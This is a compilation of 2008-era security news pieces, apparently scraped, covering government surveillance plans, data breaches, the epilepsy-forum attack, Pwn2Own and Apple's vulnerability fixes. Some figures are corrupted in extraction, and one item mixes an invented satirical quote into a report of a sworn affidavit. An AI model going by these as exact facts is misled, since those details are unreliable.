Within the next few days, Reps. Jane Harman (D-Calif.) and Christopher Carney (D-Penn.), who lead Homeland Security subcommittees, are planning to send Chertoff a letter that says the new scheme still isn't ready for launch, a Democratic aide to the U.S. House of Representatives Homeland Security Committee, which oversees the department, told CNET News.com on Wednesday.

Committee leaders say the charter for the National Applications Office is "wholly inadequate," said the aide, who spoke on condition of anonymity since the letter is still being drafted. They plan to criticize the department for allegedly failing to outline the legal framework and other "standard operating procedures" governing the program.

Furthermore, the Government Accountability Office has not yet vetted the program's privacy guidelines, which was made a condition for the National Applications Office to receive congressional funding, the aide said.

On cybersecurity
Also at the roundtable discussion, Chertoff attempted to defuse concerns that Homeland Security's cybersecurity arm plans to "sit on the Internet," as he put it, and monitor traffic in a manner reminiscent of the Chinese government.

As part of its efforts to detect network intrusions in real time, Homeland Security has said it plans to expand use of an existing system known as Einstein, that will, among other things, monitor visits from Americans and foreigners visiting .gov Web sites. The set-up is in place at 15 federal agencies, but Chertoff has asked for $293.5 million from Congress in next year's budget to roll it out governmentwide.

In addition to outfitting federal networks with those tools, Chertoff said the government also plans to help companies to fend off cyberattacks by offering some of its "classified" intrusion detection tools--but such aid will be purely optional.

As for the department's broader strategy, "in some ways, it's more and better of what we're doing," Chertoff said. "In some cases, it may involve some additional things I can't talk about."

Sidestep spammers with dedicated email accounts for online bills. By Andrew Brown.

Somewhere out there some firm that holds my credit-card details has been hacked. I know this because I have started to get spam to an email address I only ever use for buying things. I have no idea which firm it might be: in the past 212 years, I have had at least 520 messages to that address, from about 75 different companies. I don't think it's likely that any of the big ones has been hacked or else we would hear more of it. (Wouldn't we?) But among the software publishers, the music sites, the wine merchants and second-hand book dealers I have been paying from this address there is one whose customer database has been plundered.

Keeping specialised and unique email addresses for different tasks is one of those tricks that everyone should know and practice: for one thing, it can be combined with spam-filtering rules to make a rock-solid defence against phishing scams. Since I have unique addresses for eBay, PayPal, the various Amazons and my bank, none of which are ever used for other correspondence, I know that an email purporting to come from any of those firms that is not sent to the right private address must be a scam, and it's easy to set up rules to delete it unread. I have not done this with the correspondence for one-off purchases, all of which went to the address that has now become a spam target, because each new address would have to be set up in the spam filter.

The gang that stole my customer details is unlikely to be the same one that is sending me the spam. There are well-established marketplaces for email lists and the number of addresses for sale is hard to grasp: one moderate-sized botnet analysed by SecureWorks last year contained 162 million addresses. Many millions of these will be dead, of course; the spamming software has routines built into it to detect and delete addresses that have been blackholed, but messages that are instead bounced will keep the address alive.

There's nothing I can do, of course, other than keep a beady eye on my credit card and bank statements. But I do that anyway, and it will only detect damage after the event. In any case, I don't know whether my credit-card details are gone. On a well-designed site, they would be stored separately from the customer database; but a well-designed site wouldn't get hacked.

In the meantime, I skim-read the spam that drifts up in what used to be my private inbox, since Thunderbird's built-in spam filter is nothing like as efficient as Gmail's, or the one in Opera's mail module. There is a strange, twisted poetry of longing to discover here. The black economy of the internet has invented another criminal trade: alongside the programmers and the data thieves, there must be copywriters for the penis-enlargement pills. Perhaps someone, somewhere is publishing What Penis? magazine.

You'd have thought that after 10 years or more of pretty much continual spam there would be nothing fresh to say about enlargement pills, patches and creams. How can there be anyone out there who supposes that any of this will work? Yet the inexhaustible stream of spam proves that there must be hundreds of suckers born every minute.

Much of it seems written by people who don't speak English as a first language. But the awful thing is that all the circumlocutions are perfectly clear, because they speak to the universal fear of being a despised outcast. If you take the time to read the spam, it becomes clear that the market is the men's equivalent of anti-ageing creams for women: what is really being offered is the promise of being attractive, or at least not loathsome.

It may seem implausible to anyone over the age of 12 that a man whose tool bangs against his knees will be - whatever his other problems - irresistible to women. But the alternative explanation for a lack of success is that women are giggling behind your back at your pathetic, stunted personality. And that would be even worse.

Security is both a feeling and a reality, and they're different. You can feel secure even though you're not, and you can be secure even though you don't feel it. There are two different concepts mapped onto the same word — the English language isn't working very well for us here — and it can be hard to know which one we're talking about when we use the word.

There is considerable value in separating out the two concepts: in explaining how the two are different, and understanding when we're referring to one and when the other. There is value as well in recognizing when the two converge, understanding why they diverge, and knowing how they can be made to converge again.

Some fundamentals first. Viewed from the perspective of economics, security is a trade-off. There's no such thing as absolute security, and any security you get has some cost: in money, in convenience, in capabilities, in insecurities somewhere else, whatever. Every time someone makes a decision about security — computer security, community security, national security — he makes a trade-off.

People make these trade-offs as individuals. We all get to decide, individually, if the expense and inconvenience of having a home burglar alarm is worth the security. We all get to decide if wearing a bulletproof vest is worth the cost and tacky appearance. We all get to decide if we're getting our money's worth from the billions of dollars we're spending combating terrorism, and if invading Iraq was the best use of our counterterrorism resources. We might not have the power to implement our opinion, but we get to decide if we think it's worth it.

Now we may or may not have the expertise to make those trade-offs intelligently, but we make them anyway. All of us. People have a natural intuition about security trade-offs, and we make them, large and small, dozens of times throughout the day. We can't help it: It's part of being alive.

Imagine a rabbit, sitting in a field eating grass. And he sees a fox. He's going to make a security trade-off: Should he stay or should he flee? Over time, the rabbits that are good at making that trade-off will tend to reproduce, while the rabbits that are bad at it will tend to get eaten or starve.

So, as a successful species on the planet, you'd expect that human beings would be really good at making security trade-offs. Yet, at the same time, we can be hopelessly bad at it. We spend more money on terrorism than the data warrants. We fear flying and choose to drive instead. Why?

The short answer is that people make most trade-offs based on the feeling of security and not the reality.

I've written a lot about how people get security trade-offs wrong, and the cognitive biases that cause us to make mistakes. Humans have developed these biases because they make evolutionary sense. And most of the time, they work.

he government has further delayed the introduction of crucial legislation to criminalise new forms of hacking activities.

Laws to amend the 18-year-old Computer Misuse Act (CMA) were due this month, but have been put back as the Home Office tries to iron out potential conflicts in the legislation.

The updates are important because they target cyber crime techniques that were not envisaged when the act was first written ­ particularly, denial of service attacks and the selling of hacking tools.

Amendments were first approved by parliament in the Police and Justice Act two years ago, but have not been implemented because of potential overlap with the Serious Crime Bill and a fear they might criminalise legitimate security professionals.

The legislation is needed urgently because the CMA has been so ineffective in tackling hacking, said shadow home affairs minister James Brokenshire.

“Further delays send out the message to criminals that the UK is a soft touch on cyber crime,” he said. “We need action.”

Denial of service attacks are becoming increasingly sophisticated. Last month, gambling company Gala Coral experienced a new breed of attack that disabled its network for almost half an hour ­ despite costly protection systems.

Even when the legislation comes into force there are no guarantees it will work, said MP John Hemming, who used to run an e-commerce site.

“The government often looks for simple solutions to complex situations and very often gets it wrong,” he said.

The Home Office said no date has been set for the commencement order.
“Work on legislation will begin in April ­ we are still considering when to bring in the legislation,” said a spokeswoman.

The UK public fears online fraud and privacy invasion but are ill-informed about the rules that protect them, according to research.

The Switched On report conducted by the Ofcom Consumer Panel - an independent body that advises the communications regulator - lists immoral web merchants as a key concern for internet users, along with paedophiles and people who lie on dating sites. Members of the public also told researchers that they felt "under siege" from web and telephone spam.

These worries present a serious issue for the communications technology sector, according to Anna Bradley, chair of the panel.

"Service providers, regulators and other policy makers need to give consumers greater confidence that the risks are well managed," said Bradley.

"In addition, we need to help consumers understand about the existing protections, make the residual risks clear to them and help them to make their own electronic environment safer.”

Internet griefers descended on an epilepsy support message board last weekend and used JavaScript code and flashing computer animation to trigger migraine headaches and seizures in some users.

The nonprofit Epilepsy Foundation, which runs the forum, briefly closed the site Sunday to purge the offending messages and to boost security.

"We are seeing people affected," says Ken Lowenberg, senior director of web and print publishing at the Epilepsy Foundation. "It's fortunately only a handful. It's possible that people are just not reporting yet -- people affected by it may not be coming back to the forum so fast."

The incident, possibly the first computer attack to inflict physical harm on the victims, began Saturday, March 22, when attackers used a script to post hundreds of messages embedded with flashing animated gifs.

The attackers turned to a more effective tactic on Sunday, injecting JavaScript into some posts that redirected users' browsers to a page with a more complex image designed to trigger seizures in both photosensitive and pattern-sensitive epileptics.

RyAnne Fultz, a 33-year-old woman who suffers from pattern-sensitive epilepsy, says she clicked on a forum post with a legitimate-sounding title on Sunday. Her browser window resized to fill her screen, which was then taken over by a pattern of squares rapidly flashing in different colors.

Fultz says she "locked up."

"I don't fall over and convulse, but it hurts," says Fultz, an IT worker in Coeur d'Alene, Idaho. "I was on the phone when it happened, and I couldn't move and couldn't speak."

After about 10 seconds, Fultz's 11-year-old son came over and drew her gaze away from the computer, then killed the browser process, she says.

"Everyone who logged on, it affected to some extent, whether by causing headaches or seizures," says Browen Mead, a 24-year-old epilepsy patient in Maine who says she suffered a daylong migraine after examining several of the offending posts. She'd lingered too long on the pages trying to determine who was responsible.

Circumstantial evidence suggests the attack was the work of members of Anonymous, an informal collective of griefers best known for their recent war on the Church of Scientology. The first flurry of posts on the epilepsy forum referenced the site EBaumsWorld, which is much hated by Anonymous. And forum members claim they found a message board thread -- since deleted -- planning the attack at 7chan.org, a group stronghold.

Fultz says the attack spawned an uncommonly bad seizure. "It was a spike of pain in my head," she says. "And the lockup, that only happens with really bad ones. I don't think I've had a seizure like that in about a year."

But she's satisfied with the Epilepsy Foundation's relatively fast response to the attack, about 12 hours after it began on Easter weekend. "We all really appreciate them for giving us this forum and giving us this place to find each other," she says.

Epilepsy affects an estimated 50 million people worldwide, about 3 percent of whom are photosensitive, meaning flashing lights and colors can trigger seizures.

It turns out malware somehow found its way onto a Maine-based supermarket chain's servers, which led to the security breach announced earlier this month compromising up to 4.2 million credit cards.

Citing a letter the Hannaford grocer sent to Massachusetts regulators, The Boston Globe on Friday reported that the malicious software intercepted data from customers as they paid with plastic at checkout counters and sent data overseas.

The malware was installed on computer servers at each of the 300-some stores operated by Hannaford and its partners, the Globe reported.

The company is continuing its investigation into how the malware may have been placed on the servers. The Secret Service, meanwhile is conducting its own investigation.

The breach appears to be one of the first in which credit card numbers were stolen while the information was in transit, or at the point of sale. One of a growing number of sophisticated attacks, it illustrates vulnerabilities in the communication between cash registers and branch servers, as Neal Krawetz of Hacker Factor Solutions has warned in research (PDF).

That mode contrasts to attacks on databases, the method used to compromise 45.7 million accounts over a two-year period in a data breach of customer records at TJX Companies, the operator of T.J. Maxx and Marshalls retail chains.

Andrew Conry of InformationWeek adds that Hannaford, in addition to the breach, has two related class action lawsuits on its hands alleging negligence in maintaining customer security. And he suggests that there might be some truth to the claims, noting that Hannaford should have noticed that "internal servers were transmitting outside the network to a strange IP. This should've raised flags somewhere--server logs, IDS logs, firewall logs."

I'll second Conry's conclusion: "In any case, the whole mess should be very instructional to retailers everywhere," particularly in light of Friday's news of attacks on top Web sites like USAToday.com, Target.com, ABCNews.com, Walmart.com, and of a data breach at Antioch University in Ohio.

Fujifilm Recording Media has launched in the US a GPS tracking device for tape storage — the backup and archiving medium with a nasty habit of "disappearing" while in transit to remote sites.

Fujifilm Tape Tracker is a wireless device that discreetly fits into a standard half-inch tape cartridge. The company partnered with cargo monitoring firm SC-Integrity (SCI) to develop software to monitors the Fuji-bugged tapes as they move between data centers or disaster recovery locations. Data center admins can use a web-based application to find the device using maps and satellite images.

Tape Tracker is based on LoJack InTransit, a system SCI developed with LoJack in 2006. According to Fujifilm, the software can set boundaries that will send alerts if the cargo strays from its route. The service also provides chain of custody history reports and 24/7 monitoring.

The cost of using Fujifilm's digital snitch costs $150 per month through the company's resellers.

Fujifilm hopes to capitalize on tape archiving data breach scares that pop up on a disturbingly consistent basis. Most recently, US retailer J.C. Penny had a backup tape allegedly stolen that included personal information belonging to more than 650,000 customers. ®

It held out as long as possible, but a Windows Vista laptop fell to a determined bunch of hackers Friday evening at the Pwn to Own contest at CanSecWest.

Since it was the third day of the contest, which saw a MacBook Air get hacked on Thursday, the TippingPoint Zero Day Initiative relaxed the rules even further. On the first day of the contest, only the operating system could be targeted, but on the second day that was expanded to include standard applications. An undisclosed Safari flaw led to the MacBook Air's downfall.

But on Friday, hackers could target any "popular" piece of application software that you might find on a system. The Fujitsu laptop, running Vista Ultimate, was compromised by a previously undiscovered flaw in Adobe's Flash software.

Shane Macaulay, Derek Callaway and Alexander Sotirov, were able to gain control of the laptop, which also means they get to keep it. However, since the rules had been relaxed, they only get $5,000; the MacBook Air winners collected $10,000.

The contest rules stipulated that any winner sign a nondisclosure agreement immediately after a successful hack, so that the nature of the flaw could be disclosed to the vendor. Once Adobe and Apple patch their flaws, the nature of the flaw will be disclosed.

A Sony Vaio laptop running Ubuntu remained unscathed at the end of the conference.

Interviews for first time passport applicants have been massively successful - because, er, no fraudulent applications at all have been detected since the government introduced the system last May. In answer to a Freedom of Information request, the Home Office said last week that 38,391 interviews had been held to date, 222 applications were currently under investigation, but that so far no application had been rejected.

An Identity & Passport Service spokesman told the Press Association, optimistically, that interviews discouraged people from making false passport applications in the first place. He also claimed that IPS had detected 6,500 fraudulent passport applications last year. These will have been rejected before the interview stage, although not all will have been made by first time applicants.

But that 6,500 claim is a bit of a puzzle. In January of this year the Home Office Minister i/c identity, Meg Hillier, said that for the 11 months to 30 September 2006 IPS estimated that 0.25 per cent of passport applications, or 16,500 cases, were believed to be fraudulent. A further 1.61 per cent (105,000) included "some element of false declaration", but the identity and eligibility of these individuals "was not otherwise in doubt" (answer to Parliamentary question).

As IPS clearly differentiates between an "element of false declaration" and attempting to obtain a passport fraudulently, its definition of passport fraud obviously has some flexibility to it.

Answering another question in the same vein last July, Hillier said that IPS was then investigating "some 2,000 cases" of suspected fraud. Which puts the total of 222 interview-derived investigations into perspective. The Home Office has also claimed in the past that half of all fraudulent applications are made via the first time application process.

Doubts about the actual rates of fraud and detection are further reinforced by IPS figures, produced in answer to an FOIA request in August 2006. These put detected fraudulent applications at 1,126 in 2005, 1,880 in 2004 and 1,571 in 2003, the overall trend being downwards since 2001.

Obviously, not everybody can be right here. If the 6,500 detection number IPS is now claiming is genuine (i.e., not the consequence of a more brutal approach to the odd "element of false declaration"), then historically IPS must have been relatively useless at nicking passport fraud villains. If however IPS' estimate of 16,500 is correct, then the 6,500 actual detections indicate that IPS might not be as useless as it was, but that it is still fairly useless.

And the point of interviews? It seems bizarre that in ten months, interviewing almost 40,000 people, IPS has not been able to identify a single one as sufficiently obviously fraudulent to reject them. Are all the would-be first time fraudsters sufficiently smart to realise they'll be nicked if they apply? Or are all of them sufficiently smart to sail through the interview anyway? There really ought to be some kind of population in between these two extremes, and 222 doubtfuls doesn't look large enough to accommodate it.

According to Hillier, IPS is due to complete a sampling exercise similar to the one that produced the 2006 estimates next month. If the Home Office claims that half of all frauds were first time applications, and that the interview process deters frauds, are correct, then the numbers this time around - covering the first year of interviews - should be substantially down.

If not, then Tory and Liberal claims that the interview process, which involved setting up a network of 70 offices at a cost of £93 million, is an expensive waste of time will be borne out. Unless of course you were to view the interview centre network as softening the population up for mass biometric enrolment, starting 2012...

THE WHITE HOUSE told a federal judge late last Friday that it shouldn't be ordered to copy hard drives to preserve its zillions of missing emails because it destroys the older computers that it replaces, that emails are missing is merely speculation and doing that would be too expensive and cause it too much work and it has a bit of a headache and is going for a lie down.

US Magistrate Judge John Facciola had last week ordered the administration to show just cause why it should not be required to produce copies of computer hard drives in response to lawsuits filed by citizen watchdog groups.

In a sworn affidavit filed just before the deadline, Theresa Payton, CIO of the White House Office of Administration, may have said: "When workstations are at the end of their lifecycle and retired... under the refresh program, the hard drives are generally sent offsite to another government entity for the forced imposition of democracy or physical destruction, whichever occurs first."

In another filing, the White House claimed that "the allegation of missing e-mail from archives is unconfirmed,... the allegation of missing e-mails from backup tapes is conjectural", and even if some older computers were still in use, finding them and copying their hard drives would "impose a significant burden."

This is just the latest development in a long saga stretching back at least five years. Harpers has a brief take on it here, noting that most of the US media is conveniently burying the story.

On Tuesday, Anti-Malware Test Lab and AV-Comparatives.org announced an alliance toward becoming one of the most respected sources of objective and independent information about antivirus products. Together they intend to create a unique system of integrated tests for determining the effectiveness of commercial antivirus software by the end of 2008.

Andrea Clementi, founder of AV-Comparatives, said in a statement that "the partnership with Anti-Malware Test Lab will allow us to evaluate more aspects of antivirus software and to offer users a more comprehensive independent view of various security products."

Clementi further hinted that if this alliance works out, there may be additional alliances of independent antivirus software-testing labs.

"I'm sure that our partnership will act as a driving force for the development of the industry as a whole," said Sergey Ilyin, founder of Anti-Malware Test Lab. Anti-Malware Test Lab is an independent Russian test laboratory, a subsidiary of Anti-Malware.ru. The laboratory is best known for testing active infection treatments, antivirus heuristics, and anti-rootkit protection.

This is the second partnership of antivirus-testing organizations in recent months. In January, various antivirus vendors and media outlets gathered in Spain to discuss creating an antivirus test standards group. That group includes F-Secure, Kaspersky Lab, McAfee, Panda Software, and Symantec, according to Andreas Marx, managing director of AV-Test.org.

The war against tech espionage in America continues, with a US beak sentencing 66-year-old Chinese-American Chi Mak to 24 years in jail.

According to an AFP report, District Judge Cormac Carney said yesterday that his tough sentence would "provide a strong deterrent to the People's Republic of China not to send its agents here to steal American military secrets".

Mak, a longtime US citizen and resident orginally hailing from Guangzhou, was found guilty last May of conspiracy to violate export regulations and of failing to register as a Chinese importing agent after a six week trial. He was not charged with espionage, according to prosecutors, because none of the information he lifted was actually classified. However, the feds successfully contended that the data was of military value and that Mak had committed crimes in passing it to the People's Republic.

"We will never know the full extent of the damage that Mr Mak has done to our national security," wrote Carney in his sentencing statement.

The main information said to have been stolen related to "Quiet Electric Drive" technology developed for US submarines by Mak's employer Power Paragon. Chi Mak's brother Tai found himself wearing a pair of federal bracelets when he tried to fly to the People's Republic with a diskful of silent-sub knowhow in 2005. Another Mak relative, Gu Wei Hao, was said to have rashly tried to recruit an undercover fed to act as go-between in an attempt to blag Space Shuttle blueprints.

Greg Chung, the 72-year-old longtime US citizen who was supposed to have furnished Gu with the spaceship secrets and other valuable intel, was finally arrested in February. He could face up to 150 years in prison if convicted on all charges.

To help educate internet users about the potential dangers of the online world, security firm McAfee has created a free 10-step internet safety plan.

Available through the McAfee Advice Center, the ebook is broken into separate sections each aimed at providing safety guidelines for various age groups and experience levels, including kids, teens, parents, teachers and community groups.

In conjunction with the guidelines, there is also a quiz aimed at that challenges teens' knowledge of online risks and their ability to stay safe from spyware, spam, scams and identity theft.

"The days when people went online only to gather information and send email have changed," said Todd Gebhart, senior vice president and general manager of Consumer, Mobile and Small Business for McAfee.

"Cyberspace is an exciting environment full of opportunity, but it is also increasingly risky, with numerous threats emerging daily. Parents need to be on guard whenever their children venture online, so we've developed some simple steps to help ensure that young people's online experiences are safe and pleasant."

According to recent research, teens and kids are known to engage in risky online behaviour. For example, while 51 per cent of teens have downloaded music, the search term 'digital music' often leads to drive-by download sites that can populate a computer with spyware, viruses and exploits without users' knowledge. In addition, 45 per cent of young people said someone they've never met in person has asked them for personal information online.

The guidelines also include a section on how to save chat session logs, block users, report intruders and it provides recommendations for age-appropriate browsers and search engines, among other tips.

McAfee hopes that its new ebook will help families work together to set boundaries and create a list of rules to follow.

Apple on Tuesday released its second security update of the year--and it's a big one.

Known as APPLE-SA-2008-03-18 Security Update 2008-002, it contains more than 40 specific fixes for versions of Mac OS X. The most significant updates include Apache, ClamAV, Emacs, OpenSSH, PHP, and X11. To get the update, go to the Software Update pane in System Preferences, or Apple's Software Downloads Web site. The update "is recommended for all users and improves the security of Mac OS X," according to the Apple Downloads page.

Also on Tuesday, Apple released version 3.1 of its Safari browser for both Mac and Windows users. The release includes new features as well as security fixes, most of which address cross-site scripting flaws.

AFP Client--afp:// URL
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses an afp:// URL vulnerability in CVE-2007-4680. A remote attacker may be able to cause a certificate to appear trusted. According to Apple, "multiple stack buffer overflow issues exist in AFP Client's handling of afp:// URLs. By enticing a user to connect to a malicious AFP Server, an attacker may cause an unexpected application termination or arbitrary code execution."

AFP Server--Cross-realm authentication
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a cross-realm authentication vulnerability in CVE-2008-0045. Apple says: "An implementation issue exists in AFP Server's check of Kerberos principal realm names. This may allow unauthorized connections to the server, when cross-realm authentication with AFP Server is used. This update addresses the issue by through improved checks of Kerberos principal realm names. This issue does not affect systems running Mac OS X v10.5 or later." Apple also says that this issue has been addressed within Mac OS X v10.5 or later. Apple credits Ragnar Sundblad of KTH - Royal Institute of Technology, Stockholm, Sweden for reporting this issue.

Apache--1
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2. The update addresses Apache 1.3.33 and 1.3.39 vulnerabilities in CVE-2005-3352, CVE-2006-3747, CVE-2007-3847, CVE-2007-5000, CVE-2007-6388.. Apple says "Apache is updated to version 1.3.41 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the Apache web site at http://httpd.apache.org For Mac OS X v10.5, Apache version 1.3.x is only shipped on Server configurations. mod_ssl is also updated from version 2.8.24 to 2.8.31 to match the upgraded Apache; no security fixes are included in the update."

Apache--2
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2 and addresses various Apache 2.2.6 vulnerabilities in CVE-2007-5000, CVE-2007-6203, CVE-2007-6388, CVE-2007-6421, CVE-2008-0005. Apple says "Apache is updated to version 2.2.8 to address several vulnerabilities, the most serious of which may lead to cross-site scripting."

AppKit--NSDocument API
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a NSDocument API vulnerability in CVE-2008-0048. Apple says " A stack buffer overflow exists in the NSDocument API's handling of file names. On most file systems, this issue is not exploitable. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later."

AppKit--NSApplication
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a NSApplication vulnerability in CVE-2008-0049. Apple says "By sending maliciously crafted messages to privileged applications in the same bootstrap namespace, a local user may cause arbitrary code execution with the privileges of the target application. This update addresses the issue by removing the mach port in question and using another method to synchronize. This issue does not affect systems running Mac OS X v10.5 or later."

AppKit--Multiple integer overflow
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a Multiple integer overflow vulnerability in CVE-2008-0057. Apple says " By causing a maliciously formatted serialized property list to be parsed, an attacker could trigger a heap-based buffer overflow which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of serialized input. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit--network printer
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The addresses a vulnerability in CVE-2008-0997. Apple says "by enticing a user to query a network printer, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved handling of PPD files. This issue does not affect systems running Mac OS X v10.5 or later."

Application Firewall (German)
This patch affects users of Mac OS X v10.4.11, Mac OS X v10.5.2. The update addresses a vulnerability in CVE-2008-0046. Apple says " the "Set access for specific services and applications" radio button of the Application Firewall preference pane was translated into German as "Zugriff auf bestimmte Dienste und Programme festlegen", which is "Set access to specific services and applications". This might lead a user to believe that the listed services were the only ones that would be permitted to accept incoming connections. This update addresses the issue by changing the German text to semantically match the English text. This issue does not affect systems prior to Mac OS X v10.5.

CFNetwork
This patch affects users of Mac OS X v10.4.11, Mac OS X v10.5.2 and addresses the frame navigation policy vulnerability in CVE-2008-0050. Apple says "a malicious HTTPS proxy server may return arbitrary data to CFNetwork in a 502 Bad Gateway error. A malicious proxy server could use this to spoof secure websites. This update addresses the issue by returning an error on any proxy error, instead of returning the proxy-supplied data. This issue is already addressed in systems running Mac OS X v10.5.2."

ClamAV--1
This patch affects users of Mac OS X Server v10.5.2. The update addresses vulnerabilities in CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-5759, CVE-2007-6335, CVE-2007-6336, CVE-2007-6337, CVE-2008-0318, CVE-2008-0728. Apple says "multiple vulnerabilities exist in ClamAV 0.90.3 provided with Mac OS X Server v10.5 systems, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1."

ClamAV--2
This patch affects users of Mac OS X Server v10.4.11. The update addresses vulnerability in CVE-2006-6481, CVE-2007-1745, CVE-2007-1997, CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-0897, CVE-2007-0898, CVE-2008-0318, CVE-2008-0728. Apple says "multiple vulnerabilities exist in ClamAV 0.88.5 provided with Mac OS X Server v10.4.11, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1."

CoreServices
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses the vulnerability in CVE-2008-0052. Apple says: "Files with names ending in ".ief" can be automatically opened in AppleWorks if Safari's "Open 'Safe' files" preference is enabled. This is not the intended behavior and could lead to security policy violations. This update addresses the issue by removing ".ief" from the list of safe file types. This issue only affects systems prior to Mac OS X v10.5 with AppleWorks installed."

CUPS
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a vulnerability in CVE-2008-0596. Apple says "by sending a large number of requests to add and remove shared printers, an attacker may be able to cause a denial of service. This issue can not result in arbitrary code execution. This update addresses the issue through improved memory management. This issue does not affect systems prior to Mac OS X v10.5."

CUPS
This patch only affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0047. According to Apple "a heap buffer overflow exists in the CUPS interface's processing of search expressions. If printer sharing is enabled, a remote attacker may be able to cause an unexpected application termination or arbitrary code execution with system privileges. If printer sharing is not enabled, a local user may be able to gain system privileges. This update addresses the issue by performing additional bounds checking. This issue does not affect systems prior to Mac OS X v10.5." Apple credits the regenrecht working with the VeriSign iDefense VCP for reporting this vulnerability.

CUPS
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0053, and CVE-2008-0882.. Apple says "multiple input validation issues exist in CUPS, the most serious of which may lead to arbitrary code execution with system privileges. This update addresses the issues by updating to CUPS 1.3.6. These issues do not affect systems prior to Mac OS X v10.5.."

curl
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11 and addresses a vulnerability in CVE-2005-4077. Apple says " A one byte buffer overflow exists in curl 7.13.1. By enticing a user to run curl with a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue by updating curl to version 7.16.3. Crash Reporter was updated to match the curl changes. This issue does not affect systems running Mac OS X v10.5 or later."

Emacs
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a format string vulnerability in CVE-2007-6109. Apple says "A stack buffer overflow exists in Emacs' format function. By exploiting vulnerable Emacs Lisp which allows an attacker to provide a format string containing a large precision value, an attacker may cause an unexpected application termination or possibly arbitrary code execution."

Emacs
This patch affects users of Mac OS X v10.4.11 and Mac OS X v10.5.2. The update addresses a safe mode checks vulnerability in CVE-2007-5795. Apple says "a logic error in Emacs' hack-local-variable function allows any local variable to be set, even if 'enable-local-variables' is set to :safe. By enticing a user to load a file containing a maliciously crafted local variables declaration, a local user may cause an unauthorized modification of Emacs Lisp variables leading to arbitrary code execution. This issue has been fixed through improved :safe mode checks.

file
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a vulnerability in CVE-2008-1004. Affected users may find that requesting to unblock a website leads to information disclosure. Apple says "an integer overflow vulnerability exists in the file command line tool, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later." Apple credits Colin Percival of the FreeBSD for reporting this issue.

Foundation--1
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. The addresses a NSSelectorFromString API vulnerability in CVE-2008-0054. Apple says "an input validation issue exists in the NSSelectorFromString API. Passing it a malformed selector name may result in the return of an unexpected selector, which could lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation on the selector name. This issue does not affect systems running Mac OS X v10.5 or later."

Foundation--2
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. The update addresses the NSFileManager vulnerability in CVE-2008-0055. Apple says "when performing a recursive file copying operation, NSFileManager creates directories as world-writable, and only later restricts the permissions. This creates a race condition during which a local user can manipulate the directory and interfere in subsequent operations. This may lead to a privilege escalation to that of the application using the API. This update addresses the issue by creating directories with restrictive permissions. This issue does not affect systems running Mac OS X v10.5 or later."

Foundation--3
This patch affects users of Mac OS X v10.4.11, Mac OS X v10.5.2 and addresses the NSFileManager API vulnerability in CVE-2008-0056. Apple says "a long pathname with an unexpected structure can expose a stack buffer overflow vulnerability in NSFileManager. Presenting a specially crafted path to a program using NSFileManager could lead to the execution of arbitrary code. This update addresses the issue by ensuring a properly sized destination buffer. This issue does not affect systems running Mac OS X v10.5 or later."

Foundation--4
This patch affects users of Mac OS X v10.4.11 and Mac OS X v10.5.2. The update addresses a vulnerability in CVE-2008-0058. Apple says "a thread race condition exists in NSURLConnection's cache management, which can cause a deallocated object to receive messages. Triggering this issue may lead to a denial of service, or arbitrary code execution with the privileges of Safari or another program using NSURLConnection." Apple credits Daniel Jalkut of Red Sweater Software for reporting this vulnerability.

Foundation--5
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. The update addresses a race condition vulnerability in CVE-2008-0059. Apple says " A race condition exists in NSXML. By enticing a user to process an XML file in an application which uses NSXML, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improvements to the error handling logic of NSXML. This issue does not affect systems running Mac OS X v10.5 or later.."

Help Viewer
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, and Mac OS X Server v10.5.2. The update addresses the vulnerability in CVE-2008-0060. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. Apple says "A malicious help:topic_list URL may insert arbitrary HTML or JavaScript into the generated topic list page, which may redirect to a Help Viewer help:runscript link that runs Applescript." Apple credits Brian Mastenbrook for reporting this vulnerability.

Image Raw
